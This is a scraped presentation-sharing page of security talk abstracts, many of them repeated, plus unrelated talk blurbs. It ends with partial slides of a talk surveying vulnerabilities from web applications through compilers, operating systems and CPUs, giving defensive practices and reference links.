This document discusses various security vulnerabilities and solutions across different levels, from web applications and external components to operating systems, hardware, and compilers. Examples are given of vulnerabilities such as XSS, OS command injection, Rowhammer, Meltdown/Spectre, and compiler bugs. Solutions discussed include using secure frameworks, following best practices like least privilege and patching, monitoring system integrity, and fuzzing to discover issues. The overall message is that while best practices reduce risk, both software and hardware are inherently vulnerable, so security must be an ongoing process rather than a single solution.
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
A practical OWASP Testing Guide walk-through focused on passive and semi passive web app testing techniques
NOTE: Use the "Download" option at the top to see the presentation as a PDF properly
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Silent web app testing by example - BerlinSides 2011Abraham Aranguren
A practical OWASP Testing Guide walk-through focused on passive and semi passive web app testing techniques
NOTE: Use the "Download" option at the top to see the presentation as a PDF properly
Update on progress of the 4 OWASP OWTF GSoC 2013 projects, with an intro overview about OWTF and some examples on how the OWASP Testing Guide is being covered at the moment towards the end.
Running security tests as a part of your CI pipeline allows you to provide better and more relevant feedback to developers as quickly as possible (also known as the “Shift Left paradigm”/”DevSecOps” methodology).
Those slides are from a session at DevOpsDays TLV 2017 - how to use OWASP Zap to create valuable dynamic security tests. In those slide, I'm showing how we added those test to one of our open source project - Tweek (https://github.com/soluto/tweek)
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Abraham Aranguren
Introduction to the Offensive (Web, etc) Testing Framework
Demos: http://www.youtube.com/playlist?list=PL1E7A97C1BCCDEEBB&feature=plcp
Download as PDF if fonts look funny.
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
The web client is critical software to secure from any perspective. No matter if you're an organization or a casual client, you're typically just as vulnerable as anyone else. OSes are often supplemented with hardening toolsets or built-in mitigations as an extra measure to avoid compromise, but as with all things, they aren't completely solid either. Thus the need for systems that break systems, some of which deploy fuzzing and almost all of them work to find implementation bugs. Browser fuzzing has been explored and improved in many different ways over the past several years. In this presentation, we'll be primarily talking about a mutation engine that provides a somewhat novel technique for finding bugs in a still-ripe attack surface: the browser's rendering engine. This technique has the flexibility to be applied even more broadly than browsers, for example, there's initial support for fuzzing PDF readers. We'll also be discussing the tooling and infrastructure areas of the process, detailing what's needed to build a system that will scale and enable your fuzzing strategies to be successful. Finally, we can conclude the talk with some incubation results and how you can start making use of these fuzzing techniques today to find the bugs you need to exploit browsers or identify and fix the code responsible for each vulnerability.
AppSec & OWASP Primer
By Matt Scheurer (@c3rkah)
Cincinnati, Ohio
Date: 09/17/2019
Cincinnati Tri-State (ISC)2 Chapter
September Meeting
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG), an Ambassador for Bugcrowd, and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), Information Systems Security Association (ISSA), and InfraGard.
A workshop about the "dark side" of iOS, Objective-C and Xcode. Discussion about private API, why Apple doesn't want you to use it and how they enforce that. What information can you extract from a compiled binary? Let's take a look at the possibilities of reverse engineering including demos and showcases.
This was presented at the March 16th, 2016 WordPress Meetup in Hamilton and describes WordPress Security and best practices that should be taken to protect any WordPress website against hackers whom target WordPress websites and impact your Google reputation and online presence.
libinjection: from SQLi to XSS by Nick GalbreathCODE BLUE
libinjection was introduced at Black Hat USA 2012 to quickly and accurately detect SQLi attacks from user inputs. Two years later the algorithm has been used by a number of open-source and proprietary WAFs and honeypots. This talk will introduce a new algorithm for detecting XSS. Like the SQLi libinjection algorithm, this does not use regular expressions, is very fast, and has a low false positive rate. Also like the original libinjection algorithm, this is available on GitHub with free license.
Nick Galbreath
Nick Galbreath is Vice President of Engineering at IPONWEB, a world leader in the development of online advertising exchanges. Prior to IPONWEB, his role was Director of Engineering at Etsy, overseeing groups handling security, fraud, security, authentication and other enterprise features. Prior to Etsy, Nick has held leadership positions in number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market. He is the author of ""Cryptography for Internet and Database Applications"" (Wiley). Previous speaking engagements have been at Black Hat, Def Con, DevOpsDays and other OWASP events. He holds a master's degree in mathematics from Boston University and currently resides in Tokyo, Japan.
In 2013
- LASCON http://lascon.org/about/, Keynote Speaker Austin, Texas USA
- DevOpsDays Tokyo, Japan
- Security Development Conference (Microsoft) San Francisco, CA, USA
- DevOpsDays Austin, Texas, USA
- Positive Hack Days http://phdays.com, Moscow Russia
- RSA USA, San Francisco, CA, speaker and panelist
In 2012
- DefCon
- BlackHat USA
- Others
Beyond the 'cript practical i os reverse engineering lasconNino Ho
The aim of this talk is to build a bridge between the mundane methodologies and vulnerabilities that everyone can find (and that are now being defended against), and a new approach that finds additional bugs that require assembly knowledge to discover.
The talk looks at the fundamentals of reversing, a primer on iOS architecture, binary patching, reversing MACH-0 binaries, and ends with some real-world examples involving bypassing jailbreak detection.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
AppSec & OWASP Top 10 Primer
By Matt Scheurer (@c3rkah)
Cincinnati, Ohio
Date: 03/21/2019
Momentum Developer Conference
Sharonville Convention Center
#momentumdevcon
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Update on progress of the 4 OWASP OWTF GSoC 2013 projects, with an intro overview about OWTF and some examples on how the OWASP Testing Guide is being covered at the moment towards the end.
Running security tests as a part of your CI pipeline allows you to provide better and more relevant feedback to developers as quickly as possible (also known as the “Shift Left paradigm”/”DevSecOps” methodology).
Those slides are from a session at DevOpsDays TLV 2017 - how to use OWASP Zap to create valuable dynamic security tests. In those slide, I'm showing how we added those test to one of our open source project - Tweek (https://github.com/soluto/tweek)
Offensive (Web, etc) Testing Framework: My gift for the community - BerlinSid...Abraham Aranguren
Introduction to the Offensive (Web, etc) Testing Framework
Demos: http://www.youtube.com/playlist?list=PL1E7A97C1BCCDEEBB&feature=plcp
Download as PDF if fonts look funny.
Browser Fuzzing with a Twist (and a Shake) -- ZeroNights 2015Jeremy Brown
The web client is critical software to secure from any perspective. No matter if you're an organization or a casual client, you're typically just as vulnerable as anyone else. OSes are often supplemented with hardening toolsets or built-in mitigations as an extra measure to avoid compromise, but as with all things, they aren't completely solid either. Thus the need for systems that break systems, some of which deploy fuzzing and almost all of them work to find implementation bugs. Browser fuzzing has been explored and improved in many different ways over the past several years. In this presentation, we'll be primarily talking about a mutation engine that provides a somewhat novel technique for finding bugs in a still-ripe attack surface: the browser's rendering engine. This technique has the flexibility to be applied even more broadly than browsers, for example, there's initial support for fuzzing PDF readers. We'll also be discussing the tooling and infrastructure areas of the process, detailing what's needed to build a system that will scale and enable your fuzzing strategies to be successful. Finally, we can conclude the talk with some incubation results and how you can start making use of these fuzzing techniques today to find the bugs you need to exploit browsers or identify and fix the code responsible for each vulnerability.
AppSec & OWASP Primer
By Matt Scheurer (@c3rkah)
Cincinnati, Ohio
Date: 09/17/2019
Cincinnati Tri-State (ISC)2 Chapter
September Meeting
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG), an Ambassador for Bugcrowd, and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), Information Systems Security Association (ISSA), and InfraGard.
A workshop about the "dark side" of iOS, Objective-C and Xcode. Discussion about private API, why Apple doesn't want you to use it and how they enforce that. What information can you extract from a compiled binary? Let's take a look at the possibilities of reverse engineering including demos and showcases.
This was presented at the March 16th, 2016 WordPress Meetup in Hamilton and describes WordPress Security and best practices that should be taken to protect any WordPress website against hackers whom target WordPress websites and impact your Google reputation and online presence.
libinjection: from SQLi to XSS by Nick GalbreathCODE BLUE
libinjection was introduced at Black Hat USA 2012 to quickly and accurately detect SQLi attacks from user inputs. Two years later the algorithm has been used by a number of open-source and proprietary WAFs and honeypots. This talk will introduce a new algorithm for detecting XSS. Like the SQLi libinjection algorithm, this does not use regular expressions, is very fast, and has a low false positive rate. Also like the original libinjection algorithm, this is available on GitHub with free license.
Nick Galbreath
Nick Galbreath is Vice President of Engineering at IPONWEB, a world leader in the development of online advertising exchanges. Prior to IPONWEB, his role was Director of Engineering at Etsy, overseeing groups handling security, fraud, security, authentication and other enterprise features. Prior to Etsy, Nick has held leadership positions in number of social and e-commerce companies, including Right Media, UPromise, Friendster, and Open Market. He is the author of ""Cryptography for Internet and Database Applications"" (Wiley). Previous speaking engagements have been at Black Hat, Def Con, DevOpsDays and other OWASP events. He holds a master's degree in mathematics from Boston University and currently resides in Tokyo, Japan.
In 2013
- LASCON http://lascon.org/about/, Keynote Speaker Austin, Texas USA
- DevOpsDays Tokyo, Japan
- Security Development Conference (Microsoft) San Francisco, CA, USA
- DevOpsDays Austin, Texas, USA
- Positive Hack Days http://phdays.com, Moscow Russia
- RSA USA, San Francisco, CA, speaker and panelist
In 2012
- DefCon
- BlackHat USA
- Others
Beyond the 'cript practical i os reverse engineering lasconNino Ho
The aim of this talk is to build a bridge between the mundane methodologies and vulnerabilities that everyone can find (and that are now being defended against), and a new approach that finds additional bugs that require assembly knowledge to discover.
The talk looks at the fundamentals of reversing, a primer on iOS architecture, binary patching, reversing MACH-0 binaries, and ends with some real-world examples involving bypassing jailbreak detection.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
As for SAP, we saw different vulnerabilities at all levels (architecture, software vulnerabilities and implementation).
AppSec & OWASP Top 10 Primer
By Matt Scheurer (@c3rkah)
Cincinnati, Ohio
Date: 03/21/2019
Momentum Developer Conference
Sharonville Convention Center
#momentumdevcon
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Technology First
16th Annual Ohio Information Security Conference
OISC 2019
#OISC19
The OWASP Top 10 & AppSec Primer
By Matt Scheurer (@c3rkah)
Dayton, Ohio
Date: 03/13/2019
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Your data is much safer at home than it is letting some corporation "take care of it" for you, right? Security reviews for some of the top vendors' devices reveal many interesting findings. Like everything else, there are bugs. But knowing what kinds of bugs and how the vendors have responded will allow you to better understand the impact of plugging these devices into your network. Jeremy will show you just how low access control and least privilege are their list of priorities. He'll also explore the amount of test collateral and debug interfaces sloppily left shipping to consumers. From remote roots to stealing social network tokens to just plain weird stuff, he'll expand on how it's not just about what they do, but also what they don't do. And, he'll give you some useful guidelines on how to close the gaps yourself.
Construye tu stack de ciberseguridad con open sourceSoftware Guru
Construir software de forma ágil pero segura no es trivial. En esta sesión compartiré algunas recomendaciones de cómo construir un stack para desarrollar aplicaciones de forma segura utilizando herramientas open source en un stack de integración continua.
Presentado por Eryx Paredes en SG Virtual Conference 2020
WebGoat.SDWAN.Net in Depth: SD-WAN Security Assessment Sergey Gordeychik
Denis Kolegov, Oleg Broslavsky, Power of Community 2018, Seoul, Korea
Today, «SD-WAN» is a very hot and attractive topic. Software-defined WAN (SD-WAN) is a technology based on software-defined network (SDN) approach applied to wide area networks (WAN) in enterprise networks. According to Gartner’s predictions study, more than 50% of routers will be replaced with SD-WAN solutions by 2020.
In this presentation, we disclose a set of vulnerabilities in widespread and most popular SD-WAN products including Citrix NetScaler and Silver Peak EdgeConnect. We present the new results of our research, consider some technical details of the insecure design and found vulnerabilities, and describe different attack scenarios that may allow an attacker to compromise SD-WAN control and data planes.
New Era of Software with modern Application Security v1.0Dinis Cruz
(as presented at Codemotion Rome 2016)
This presentation will start with an overview of the current state of Application Insecurity (with practical examples). This will make the attendees think twice about what is about to happen to their applications. The solution is to leverage a new generation of application security thinking such as: TDD, Docker, Test Automation, Static Analysis, cleaver Fuzzing, JIRA Risk workflows, Kanban, micro web services visualization, and ELK. These practices will not only make applications/software more secure/resilient, but it allow them to be developed in a much more efficient, cheaper and productive
OWASP SF - Reviewing Modern JavaScript ApplicationsLewis Ardern
When dealing with modern JavaScript applications, many penetration testers approach from an ‘out-side-in’ perspective, this is approach often misses security issues in plain sight. This talk will attempt to demystify common JavaScript issues which should be better understood/identified during security reviews. We will discuss reviewing applications in code-centric manner by using freely available tools to help start identifying security issues through processes such as linting and dependency auditing.
Video for this session: http://www.youtube.com/watch?v=jdiu_dH3z5k
Code for this session: https://github.com/xamarin/Seminars/tree/master/2012-12-13-MVVMCross/
An introduction to one approach for using dependency injection, unit testing and MVVM in cross-platform mobile C# development with Stuart Lodge
IoT (Internet of Things) and OT (Operational Technology) are the current buzzwords for networked devices on which our modern society is based on. In this area the used operating systems are summarized with the term firmware. The devices by themself, so called embedded devices, are essential in the private, as well as in the industrial environment and in the so-called critical infrastructure. Penetration testing of these systems is quite complex as we have to deal with different architectures, optimized operating systems and special protocols. EMBA is an open-source firmware analyzer with the goal to simplify and optimize the complex task of firmware security analysis. EMBA supports the penetration tester with the automated detection of 1-day vulnerabilities on binary level. This goes far beyond the plain CVE detection. With EMBA you always know which public exploits are available for the target firmware. Beside the detection of already known vulnerabilities, EMBA also supports the tester on the next 0-day. For this EMBA identifies critical binary functions, protection mechanisms and services with network behavior on a binary level. There are many other features built into EMBA, such as fully automated firmware extraction, finding file system vulnerabilities, hard-coded credentials, and more. EMBA is an open-source firmware scanner, created by penetration testers for penetration testers.
Project page: https://github.com/e-m-b-a/emba
Conference page: https://troopers.de/troopers22/agenda/tr22-1042-emba-open-source-firmware-security-testing/
JAXLondon 2015 "DevOps and the Cloud: All Hail the (Developer) King"Daniel Bryant
Last year we talked about DevOps, what it was, why it was important and how to get started. Boy, was it scary. Now we’re wiser. More battle-scarred. The scale of the challenge for application writers exploiting cloud and DevOps is clearer, but so is the path forward. Understanding the DevOps approach is important but equally you must understand specific deployment technologies. How to exploit them and how they effect the design of applications. Whether creating simple applications or sophisticated microservice architectures many of the challenges are the same.
Presented at JAXLondon 2015 with Steve Poole
OWASP Poland 13 November 2018 - Martin Knobloch - Building Secure SoftwareOWASP
Presentation of OWASP Global Chairman of the Board - Martin Knobloch at OWASP Poland meeting in Warsaw on 13 November 2018. Great review of important OWASP Projects.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Elevating Tactical DDD Patterns Through Object CalisthenicsDorra BARTAGUIZ
After immersing yourself in the blue book and its red counterpart, attending DDD-focused conferences, and applying tactical patterns, you're left with a crucial question: How do I ensure my design is effective? Tactical patterns within Domain-Driven Design (DDD) serve as guiding principles for creating clear and manageable domain models. However, achieving success with these patterns requires additional guidance. Interestingly, we've observed that a set of constraints initially designed for training purposes remarkably aligns with effective pattern implementation, offering a more ‘mechanical’ approach. Let's explore together how Object Calisthenics can elevate the design of your tactical DDD patterns, offering concrete help for those venturing into DDD for the first time!
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
6. E xa m p l e s
• Set of examples for web applications is enormous hence…
• My own story about XSS and RCE should suffice
7. S o l u t i o n s
• Usage of publicly acclaimed frameworks according to Linus’
motto: „Given a thousand eyes, all bugs are shallow.”
• Improving the process of software development
• Secure by Design: Secure SDLC / DevSecOps implementation
• Testing according to well-known (and accepted) methodologies
such as OWASP ASVS, OWASP TOP 10, SANS 25, et cetera
9. E xa m p l e s
• Neex and bug in a way that external tool (GraphicsMagick) is invoked
(OS Command Injection) – Imgur
• Chris Evans and his bugs in ImageMagick (memory disclosures) –
vulnerable versions found on servers from companies such as
Dropbox and Yahoo!
10. S o l u t i o n s
• Conscious choice of external components
• Smaller attack surface == reduced risk
• Least-privilege principle applied to external components (e.g.
sandboxing)
11. Re fe re n c e s
• https://scarybeastsecurity.blogspot.co.uk/2017/05/proving-missing-aslr-on-
dropboxcom-and.html
• https://scarybeastsecurity.blogspot.co.uk/2017/05/0day-proving-boxcom-fixed-aslr-
via.html
• https://scarybeastsecurity.blogspot.co.uk/2017/05/bleed-more-powerful-dumping-
yahoo.html
• https://scarybeastsecurity.blogspot.co.uk/2017/05/bleed-continues-18-byte-file-
14k-bounty.html
• https://hackerone.com/reports/212696
• https://4lemon.ru/2017-01-
17_facebook_imagetragick_remote_code_execution.html
• https://blog.sigsegv.pl/external-third-party-resources-and-your-web-application/
• https://onedrive.live.com/view.aspx?resid=2664E65DD698885E!120&ithint=file%2cp
ptx&app=PowerPoint&authkey=!AK39RoVxiJ5re8Y
15. E xa m p l e s
• Deserialization of a cookie and memory corruption within PHP’s
implementation of unserialize() function – PornHub
• „The worst bug bounty ever” – very expensive romance between
Shopify and mruby
• „Exposing Hidden Exploitable Behaviors in Programming Languages
Using Differential Fuzzing” – interesting (and dangerous) behaviours
of interpreters
• My own vulnerability research of popular interpreters (for fun and no
profit)
16.
17. S o l u t i o n s
• Least-privilege principle applied to the interpreter / VM (e.g.
sandboxing)
• Banning dangerous functions (e.g. disallow certain functions in your
code base)
18. Re fe re n c e s
• https://www.evonide.com/how-we-broke-php-hacked-pornhub-and-earned-20000-
dollar/
• https://www.evonide.com/fuzzing-unserialize/
• https://sean.heelan.io/2017/08/12/fuzzing-phps-unserialize-function/
• https://externals.io/message/100147
• https://bugs.php.net/bug.php?id=75006
• http://mruby.sh/201703261726.html
• https://www.blackhat.com/docs/eu-17/materials/eu-17-Arnaboldi-Exposing-Hidden-
Exploitable-Behaviors-In-Programming-Languages-Using-Differential-Fuzzing-wp.pdf
• https://github.com/dyjakan/interpreter-bugs
• https://github.com/rust-fuzz
• https://hackernoon.com/python-sandbox-escape-via-a-memory-corruption-bug-
19dde4d5fea5
20. E xa m p l e s
• ”Reflections on Trusting Trust” – Ken Thompson
• CVE-2018-1037 – .PDB Heap Memory Disclosure w Visual Studio
(j00ru (Project Zero) 🤘)
21. S o l u t i o n s
• There is no active and scalable protection
• Passive monitoring of your systems’ integrity
22. Re fe re n c e s
• https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thompson.pdf
• https://twitter.com/j00ru/status/985894472478265344
• https://bugs.chromium.org/p/project-zero/issues/detail?id=1500
26. E xa m p l e s
• CVE-2016-5195 – DirtyCOW
• CVE-2010-0232 – KiTrap0D by Tavis Ormandy (Google)
• CVE-2018-8897 – POPSS/MOVSS
27. S o l u t i o n s
• Patch management policy along with actual implementation
• Hardening
• Best practices
• Additional defensive mechanisms
28. Re fe re n c e s
• https://dirtycow.ninja/
• http://seclists.org/fulldisclosure/2010/Jan/341
• https://www.cisecurity.org/cis-benchmarks/
• https://grsecurity.net/
• http://www.openwall.com/lkrg/
• https://support.microsoft.com/en-us/help/2458544/the-enhanced-mitigation-
experience-toolkit
• https://docs.microsoft.com/en-
us/powershell/module/processmitigations/?view=win10-ps
• https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-
defender-exploit-guard/windows-defender-exploit-guard
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8897
• http://everdox.net/popss.pdf
34. Re fe re n c e s
• https://en.wikipedia.org/wiki/Virtual_machine_escape
• https://www.blackhat.com/presentations/bh-usa-09/KORTCHINSKY/BHUSA09-
Kortchinsky-Cloudburst-PAPER.pdf
• https://vimeo.com/6595148
• https://blogs.vmware.com/security/2017/03/security-landscape-pwn2own-
2017.html
• https://www.blackhat.com/docs/eu-17/materials/eu-17-Mandal-The-Great-Escapes-
Of-Vmware-A-Retrospective-Case-Study-Of-Vmware-G2H-Escape-Vulnerabilities.pdf
• https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-
Escapes/
36. E xa m p l e s – C P U s 1 / 2
• Bugs
• Pentium FDIV bug – Intel - $$$ = 😢
• CVE-2012-0217 (and its younger brother CVE-2006-0744) – Intel
SYSRET found in 2012 by Rafał Wojtczuk (InvisibleThingsLab)
